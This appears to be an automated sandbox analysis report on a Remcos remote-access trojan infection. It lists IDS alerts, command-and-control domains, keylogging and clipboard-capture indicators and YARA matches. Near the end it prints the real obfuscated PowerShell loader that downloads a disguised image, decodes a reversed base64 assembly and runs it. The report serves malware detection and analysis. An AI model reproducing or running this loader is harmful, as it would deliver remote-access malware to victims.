                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49883 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49880 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49948 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49922 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49928 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49955 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49967 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49954 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49961 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49993 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49895 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49984 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49970 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49974 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50000 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49805 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49999 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49946 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49935 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49916 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49932 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49940 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50006 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49987 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49980 -> 45.80.158.30:23101
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 5.182.211.158:443 -> 192.168.2.4:49737
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 5.182.211.158:443 -> 192.168.2.4:49737
                        Source: Network trafficSuricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 5.182.211.158:443 -> 192.168.2.4:49755
                        Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 5.182.211.158:443 -> 192.168.2.4:49755
                        Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 5.182.211.158:443 -> 192.168.2.4:49755
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 5.182.211.158:443 -> 192.168.2.4:49755
                        Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 5.182.211.158:443 -> 192.168.2.4:49737
                        Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 5.182.211.158:443 -> 192.168.2.4:49737
                        Source: Malware configuration extractorURLs: rem.pushswroller.eu
                        Source: Malware configuration extractorURLs: firewarzone.ydns.eu
                        Source: Malware configuration extractorURLs: dim.remofficialws.top
                        Source: Malware configuration extractorURLs: rem.officialswvrem.top
                        Source: global trafficTCP traffic: 192.168.2.4:49739 -> 45.80.158.30:23101
                        Source: global trafficHTTP traffic detected: GET /ink/gre.txt HTTP/1.1Host: set.officialswrc.topConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ink/gre.txt HTTP/1.1Host: set.officialswrc.topConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                        Source: Joe Sandbox ViewASN Name: UK2NET-ASGB UK2NET-ASGB
                        Source: Joe Sandbox ViewASN Name: SKB-ENTERPRISENL SKB-ENTERPRISENL
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49740 -> 178.237.33.50:80
                        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.18
                        Source: unknownTCP traffic detected without corresponding DNS query: 23.32.238.18
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004260F7 recv,12_2_004260F7
                        Source: global trafficHTTP traffic detected: GET /ink/gre.txt HTTP/1.1Host: set.officialswrc.topConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ink/gre.txt HTTP/1.1Host: set.officialswrc.topConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
                        Source: global trafficDNS traffic detected: DNS query: set.officialswrc.top
                        Source: global trafficDNS traffic detected: DNS query: rem.pushswroller.eu
                        Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                        Source: global trafficDNS traffic detected: DNS query: firewarzone.ydns.eu
                        Source: global trafficDNS traffic detected: DNS query: dim.remofficialws.top
                        Source: global trafficDNS traffic detected: DNS query: rem.officialswvrem.top
                        Source: MSBuild.exe, MSBuild.exe, 0000000C.00000002.2256274079.0000000000FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                        Source: MSBuild.exe, 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000001.00000002.2002003466.000001CB00E94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2002003466.000001CB00EF3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://set.officialswrc.top
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: talpe.vbs.6.drString found in binary or memory: https://github.com/koswald/VBScript
                        Source: wscript.exe, 00000008.00000003.1974579887.00000266E0A81000.00000004.00000020.00020000.00000000.sdmp, LbtytfWpvx.vbs, talpe.vbs.6.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                        Source: wscript.exe, 00000000.00000003.1699236695.0000022E127B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsbitC
                        Source: wscript.exe, 00000000.00000003.1702805355.0000022E128B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702649965.0000022E10936000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703228032.0000022E129B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1698585874.0000022E127D7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.1959638902.00000176D8A20000.00000004.00001000.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973834135.00000266DEAE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974006639.00000266E0981000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974579887.00000266E0A81000.00000004.00000020.00020000.00000000.sdmp, LbtytfWpvx.vbs, talpe.vbs.6.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                        Source: powershell.exe, 00000001.00000002.2026099087.000001CB43782000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C9A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                        Source: wscript.exe, wscript.exe, 00000008.00000002.1978037118.00000266E0885000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1975830431.00000266E0884000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977981910.00000266E0880000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1975290595.00000266E0882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai8
                        Source: wscript.exe, 00000000.00000002.1703716071.0000022E108A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gmeC
                        Source: wscript.exe, 00000008.00000002.1977583212.00000266DEA59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gmeh
                        Source: wscript.exe, 00000000.00000003.1702704778.0000022E108CE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1703772168.0000022E108CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973920441.00000266DEA7A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977583212.00000266DEA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvno
                        Source: wscript.exe, 00000000.00000003.1702704778.0000022E108CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnoc
                        Source: wscript.exe, 00000008.00000002.1977583212.00000266DEA7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnoc//
                        Source: wscript.exe, 00000000.00000002.1703772168.0000022E108CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnoc0
                        Source: wscript.exe, 00000008.00000003.1973920441.00000266DEA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocv4
                        Source: wscript.exe, 00000008.00000002.1977694405.00000266DEADA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aC=5
                        Source: wscript.exe, 00000000.00000002.1703853983.0000022E1098E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702472569.0000022E1098A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702503863.0000022E1098D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974450182.00000266DEB3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973340251.00000266DEA8F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1973834135.00000266DEAE5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977779291.00000266DEB3E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974417448.00000266DEB3B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000003.1974240401.00000266DEB38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa
                        Source: powershell.exe, 00000009.00000002.2351710903.0000025E9C781000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2351710903.0000025E9C9A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
                        Source: wscript.exe, 00000000.00000003.1702365849.0000022E108DE000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1703826317.0000022E10929000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1703033281.0000022E10929000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410al
                        Source: wscript.exe, 00000000.00000002.1703716071.0000022E108A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000008.00000002.1977583212.00000266DEA59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gte
                        Source: powershell.exe, 00000001.00000002.2002003466.000001CB00E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://set.officialswrc.top
                        Source: powershell.exe, 00000001.00000002.2002003466.000001CB00E94000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://set.officialswrc.top/ink/gre.txt
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                        Source: unknownHTTPS traffic detected: 5.182.211.158:443 -> 192.168.2.4:49737 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 5.182.211.158:443 -> 192.168.2.4:49755 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000012_2_004099E4
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_004159C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409B10
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.2262032025.0000000002D6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3171710253.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2256274079.0000000000F98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3173871595.0000000002B1F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6800, type: MEMORYSTR
                        Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041BB71 SystemParametersInfoW,12_2_0041BB71
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041BB77 SystemParametersInfoW,12_2_0041BB77

                        System Summary

                        barindex
                        Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7320, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: powershell.exe PID: 7908, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: MSBuild.exe PID: 8048, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Initial file: Dim cmd 'string: ShellExecute arg #1
                        Source: Initial file: Dim args 'string: ShellExecute arg #2
                        Source: Initial file: Dim pwd 'string: ShellExecute arg #3
                        Source: Initial file: Dim privileges 'string: ShellExecute arg #4
                        Source: Initial file: .ShellExecute cmd, args, pwd, privileges
                        Source: Initial file: Dim cmd 'string: ShellExecute arg #1
                        Source: Initial file: 'Class scope: args_ 'string: ShellExecute arg #2
                        Source: Initial file: Dim pwd 'string: ShellExecute arg #3
                        Source: Initial file: Dim privileges 'string: ShellExecute arg #4
                        Source: Initial file: .ShellExecute cmd, args_, pwd, privileges
                        Source: C:\Windows\System32\cmd.exeDropped file: Dim cmd 'string: ShellExecute arg #1Jump to dropped file
                        Source: C:\Windows\System32\cmd.exeDropped file: Dim args 'string: ShellExecute arg #2Jump to dropped file
                        Source: C:\Windows\System32\cmd.exeDropped file: Dim pwd 'string: ShellExecute arg #3Jump to dropped file
                        Source: C:\Windows\System32\cmd.exeDropped file: Dim privileges 'string: ShellExecute arg #4Jump to dropped file
                        Source: C:\Windows\System32\cmd.exeDropped file: .ShellExecute cmd, args, pwd, privilegesJump to dropped file
                        Source: C:\Windows\System32\cmd.exeDropped file: Dim cmd 'string: ShellExecute arg #1Jump to dropped file
                        Source: C:\Windows\System32\cmd.exeDropped file: 'Class scope: args_ 'string: ShellExecute arg #2Jump to dropped file
                        Source: C:\Windows\System32\cmd.exeDropped file: Dim pwd 'string: ShellExecute arg #3Jump to dropped file
                        Source: C:\Windows\System32\cmd.exeDropped file: Dim privileges 'string: ShellExecute arg #4Jump to dropped file
                        Source: C:\Windows\System32\cmd.exeDropped file: .ShellExecute cmd, args_, pwd, privilegesJump to dropped file
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$noninterest = 'https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg';$fishers = New-Object System.Net.WebClient;$marmalady = $fishers.DownloadData($noninterest);$ruddle = [System.Text.Encoding]::UTF8.GetString($marmalady);$bleekbok = '<<BASE64_START>>';$rouse = '<<BASE64_END>>';$unloose = $ruddle.IndexOf($bleekbok);$Benedict = $ruddle.IndexOf($rouse);$unloose -ge 0 -and $Benedict -gt $unloose;$unloose += $bleekbok.Length;$tumefied = $Benedict - $unloose;$biographed = $ruddle.Substring($unloose, $tumefied);$backing = -join ($biographed.ToCharArray() | ForEach-Object { $_ })[-1..-($biographed.Length)];$nonflavored = [System.Convert]::FromBase64String($backing);$hemautogram = [System.Reflection.Assembly]::Load($nonflavored);$subcarbureted = [dnlib.IO.Home].GetMethod('VAI');$subcarbureted.Invoke($null, @('txt.erg/kni/pot.crwslaiciffo.tes//:sptth', '$delie', '$delie', '$delie', 'MSBuild', '$delie','$delie','$delie','talpe', 'C:\ProgramData\','talpe','vbs','1','1','TaskName'));"Jump to behavior
